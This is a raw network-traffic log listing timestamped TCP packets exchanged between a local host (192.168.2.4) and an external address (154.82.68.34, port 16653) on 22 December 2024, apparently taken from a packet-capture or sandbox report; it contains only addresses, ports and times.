                                      Dec 22, 2024 08:37:09.783796072 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.784832954 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.784881115 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.784962893 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.785006046 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.786039114 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.786082983 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.786133051 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.786174059 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.787195921 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.787249088 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.787293911 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.787334919 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.788377047 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.788424015 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.788634062 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.788680077 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.789532900 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.789578915 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.789629936 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.789673090 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.790827990 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.790844917 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.790875912 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.790890932 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.791956902 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.792004108 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.792042017 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.792085886 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.793139935 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.793186903 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.793291092 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.793335915 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.794275999 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.794322014 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.794395924 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.794446945 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.795492887 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.795535088 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.795612097 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.795654058 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.796658993 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.796708107 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.796789885 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.796833992 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.797804117 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.797849894 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.797919035 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.797961950 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.799032927 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.799057961 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.799077988 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.799093008 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.930330992 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.930422068 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.930466890 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.930512905 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.930866003 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.930918932 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.931009054 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.931055069 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.931993961 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.932044983 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.932099104 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.932142973 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.933274031 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.933322906 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.933362961 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.933399916 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.934359074 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.934406042 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.934475899 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.934519053 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.935550928 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.935596943 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.935688972 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.935736895 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.936717033 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.936820984 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.936836004 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.936891079 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.937901974 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.937949896 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.937994957 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.938039064 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.939223051 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.939290047 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.939380884 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.939434052 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.940275908 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.940334082 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.940386057 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.940438032 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.941443920 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.941495895 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.941555023 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.941600084 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.942615986 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.942667007 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.942730904 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.942780018 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.943799973 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.943850994 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.943897009 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.943938971 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.944996119 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.945044041 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.945089102 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.945133924 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.946196079 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.946244001 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.946244955 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.946281910 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.947354078 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.947406054 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.947458029 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.947503090 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.948533058 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.948579073 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.948645115 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.948689938 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.949762106 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.949820042 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.949857950 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.949901104 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.951023102 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.951076031 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.951173067 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.951219082 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.952306032 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.952354908 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.952398062 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.952445030 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.953268051 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.953316927 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.953661919 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.953711987 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.954479933 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.954524994 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.954561949 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.954607010 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.955651045 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.955694914 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.955744982 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.955796003 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.956901073 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.956949949 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.956954002 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.956993103 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.957992077 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.958062887 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.958101988 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.958142996 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.959280014 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.959327936 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.959577084 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.959621906 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.960359097 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.960406065 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.960449934 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.960493088 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.961555004 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.961606979 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.961633921 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.961674929 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.962925911 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.962974072 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.963011026 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.963054895 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.963917971 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.963963032 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.963995934 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.964040041 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.965080976 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.965127945 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.965164900 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.965210915 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.966232061 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.966283083 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.966289043 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.966336966 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.967514038 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.967562914 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.967597961 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.967642069 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.968612909 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.968664885 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.968719006 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.968763113 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.969816923 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.969866991 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.969909906 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.969954967 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.970966101 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.971014977 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.971080065 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.971123934 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.972191095 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.972239971 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.972264051 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.972306967 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.973447084 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.973490953 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.973575115 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.973623991 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.974709034 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.974759102 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.974924088 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.974972963 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.975850105 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.975898981 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.975931883 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.975992918 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.976874113 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.976918936 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.976926088 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.976958036 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.978075981 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.978122950 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.978168011 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.978223085 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.979245901 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.979294062 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.979854107 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.979899883 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.980411053 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.980460882 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.980535030 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.980581045 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.981616974 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.981667042 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.981710911 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.981754065 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.982817888 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.982867002 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.982904911 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.982948065 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.983997107 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.984049082 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.984141111 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.984189034 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.985194921 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.985240936 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.985321045 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.985364914 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.986442089 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.986488104 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.986515999 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.986555099 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.987514019 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.987566948 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.987673044 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.987716913 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.988729000 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.988778114 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.988816977 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.988858938 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.989912987 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.989960909 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.990004063 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.990045071 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.991071939 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.991122007 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.991405964 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.991451025 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:09.992602110 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:09.992650032 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:10.123244047 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:10.123320103 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:10.123574018 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:10.123626947 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:10.123790979 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:10.123841047 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:10.123883963 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:10.123927116 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:10.124984026 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:10.125037909 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:10.125076056 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:10.125125885 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:10.126168013 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:10.126219034 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:10.126394987 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:10.126445055 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:10.127413988 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:10.127473116 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:10.127583981 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:10.127630949 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:10.128555059 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:10.128598928 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:10.128650904 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:10.128695011 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:10.129694939 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:10.129740953 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:10.129785061 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:10.129825115 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:10.130868912 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:10.130913973 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:10.130958080 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:10.131000042 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:10.132054090 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:10.132169008 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:10.132200003 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:10.132211924 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:10.133266926 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:10.133313894 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:10.133344889 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:10.133393049 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:10.134434938 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:10.134490013 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:10.134505987 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:10.134546995 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:10.135664940 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:10.135715008 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:10.135760069 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:10.135797024 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:10.136755943 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:10.136806011 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:10.136903048 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:10.136945009 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:10.137931108 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:10.137978077 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:10.138041973 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:10.138087034 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:10.139143944 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:10.139199018 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:10.139244080 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:10.139295101 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:10.140367985 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:10.140414000 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:10.140434980 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:10.140470028 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:10.141500950 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:10.141547918 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:10.141602039 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:10.141644001 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:10.142743111 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:10.142812014 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:10.142998934 CET1665349730154.82.68.34192.168.2.4
                                      Dec 22, 2024 08:37:10.143050909 CET4973016653192.168.2.4154.82.68.34
                                      Dec 22, 2024 08:37:10.144984961 CET1665349730154.82.68.34192.168.2.4
